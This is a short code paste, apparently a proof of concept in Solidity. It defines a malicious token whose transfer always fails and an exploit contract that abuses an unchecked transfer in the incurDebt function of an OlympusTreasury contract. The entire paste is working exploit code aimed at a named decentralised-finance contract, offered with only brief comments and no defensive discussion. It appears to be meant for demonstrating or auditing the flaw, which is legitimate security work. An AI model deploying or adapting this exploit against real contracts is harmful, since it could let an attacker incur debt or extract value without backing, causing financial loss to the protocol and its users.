Untitled
unknown
plain_text
a year ago
1.2 kB
2
Indexable
// Interface for the OlympusTreasury contract to call incurDebt
interface IOlympusTreasury {
function incurDebt(uint _amount, address _token) external;
}
// Malicious token contract that always fails the transfer
contract MaliciousToken {
uint256 public balance = 1000;
address public owner;
constructor() {
owner = msg.sender;
}
function transfer(address, uint256) external returns (bool) {
return false; // Always fail the transfer
}
function setBalance(uint256 _balance) external {
require(msg.sender == owner, "Not the owner");
balance = _balance;
}
}
// Exploit contract to demonstrate the vulnerability
contract Exploit {
MaliciousToken public maliciousToken;
IOlympusTreasury public olympusTreasury;
constructor(address _maliciousToken, address _olympusTreasury) {
maliciousToken = MaliciousToken(_maliciousToken);
olympusTreasury = IOlympusTreasury(_olympusTreasury);
}
function exploitUncheckedTransfer(uint _amount) external {
maliciousToken.setBalance(_amount);
olympusTreasury.incurDebt(_amount, address(maliciousToken));
}
}